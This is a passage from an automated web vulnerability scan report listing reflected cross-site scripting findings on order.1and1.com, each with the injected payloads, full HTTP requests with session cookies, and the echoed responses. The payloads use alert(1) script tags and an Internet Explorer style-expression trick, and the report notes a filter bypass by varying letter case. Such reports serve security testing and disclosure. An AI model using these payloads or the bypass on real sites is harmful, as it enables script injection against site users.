115F77E4A430487B74D.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hostingaf2f1</ScRiPt >54b667825a6";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.19. http://order.1and1.com/xml/order/Hosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Hosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Hosting. The payload 2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308 was submitted in the REST URL parameter 3. This input was returned as 2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308 in a subsequent request for the URL /xml/order/Hosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Hosting2a1d6</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>596a15d5308;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:26:16 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:40:23 GMT; Path=/
ETag: dd55d9401d77d604366a27b67fe7cbe6
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 60366


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Hosting";UNOUNO.params.lastpage="Hosting2a1d6</ScRiPt ><x style=x:expression(alert(1))>596a15d5308";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.20. http://order.1and1.com/xml/order/Instant [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Instant

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Instant is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Instant. The payload 92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727 was submitted in the REST URL parameter 3. This input was returned as 92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727 in a subsequent request for the URL /xml/order/Instant.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Instant92e84</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>9555bc59727;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:24:03 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:38:10 GMT; Path=/
ETag: a59e5633696d2ae34547ee6975e60f98
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 23877


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Instant";UNOUNO.params.lastpage="Instant92e84</ScRiPt ><ScRiPt>alert(1)</ScRiPt>9555bc59727";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.21. http://order.1and1.com/xml/order/MailInstantMail [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/MailInstantMail

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/MailInstantMail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MailInstantMail. The payload 17be3</ScRiPt%20>4a6827ab2d was submitted in the REST URL parameter 3. This input was returned as 17be3</ScRiPt >4a6827ab2d in a subsequent request for the URL /xml/order/MailInstantMail.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/MailInstantMail17be3</ScRiPt%20>4a6827ab2d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:25:04 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:39:11 GMT; Path=/
ETag: fc23060d5be31057dc0e68ab0f04deb0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25406


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="MailInstantMail";UNOUNO.params.lastpage="MailInstantMail17be3</ScRiPt >4a6827ab2d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.22. http://order.1and1.com/xml/order/MsHosting [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/MsHosting

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Request 2

GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:56:26 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=HdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUoMWFqMCMkIB8kIB4hHzA4Ly4=; Expires=Fri, 07-Apr-2079 18:10:33 GMT; Path=/
ETag: 17c5abe0f15d2a7d6b2b07c8f63d3dab
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59625


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9C6322067094898.TCpfix140a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="MsHosting";UNOUNO.params.lastpage="MsHosting9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e";UNOUNO.params.articles="0"};
   //-->
...[SNIP]...

2.23. http://order.1and1.com/xml/order/Service [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Service

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:38:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=ObmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS4xLC8wKSo=; Expires=Fri, 07-Apr-2079 21:52:19 GMT; Path=/
ETag: c4342f28d37068506013b97debbec70f
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18491


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
9CC9FB631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Service";UNOUNO.params.lastpage="Service2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2.24. http://order.1and1.com/xml/order/Sharepoint [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Sharepoint

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Request 1

GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
